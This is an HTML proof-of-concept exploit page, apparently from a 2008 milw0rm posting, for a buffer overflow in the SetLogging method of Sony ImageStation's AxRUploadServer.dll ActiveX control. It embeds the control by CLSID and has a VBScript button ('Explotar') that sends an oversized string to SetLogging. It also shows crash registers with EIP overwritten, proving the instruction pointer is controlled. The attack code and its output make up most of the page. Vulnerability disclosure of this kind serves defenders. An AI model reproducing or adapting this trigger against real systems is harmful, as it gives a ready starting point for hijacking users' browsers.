<head><title>Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)</title></head>
Dll name:AxRUploadServer.dll
Download: http://www.imagestation.com/common/classes/SonyISUpload.cab?v=1,0,0,38
This file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
Internal name:
The ez-Upload control.
Access Violation when executing 0x42424242</br>
EIP 42424242</br>
EAX 42424242</br>
EBX 00000001</br>
ECX 00FE50B0 -> 00FE0290</br>
EDX 00FE0608 -> 00187440 -> Uni: @t@t</br>
EDI 00000000</br>
ESI 00000000</br>
EBP 0013E6C4 -> 0013E6E4</br>
ESP 0013E68C -> 0145636A -> Asc: jcEjcE</br>
Discovered by:</br>
Trancek, http://www.trancek.es
Greetz: p1mp4m.es(sky, pepepistola, elvispresley, patoruzu, musashi)
<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">
<script language='vbscript'>
Sub Son
arg1=String(5922, "A")
arg2=String(5, "B")
bof.SetLogging arg1 + arg2
End Sub
# milw0rm.com [2008-02-08]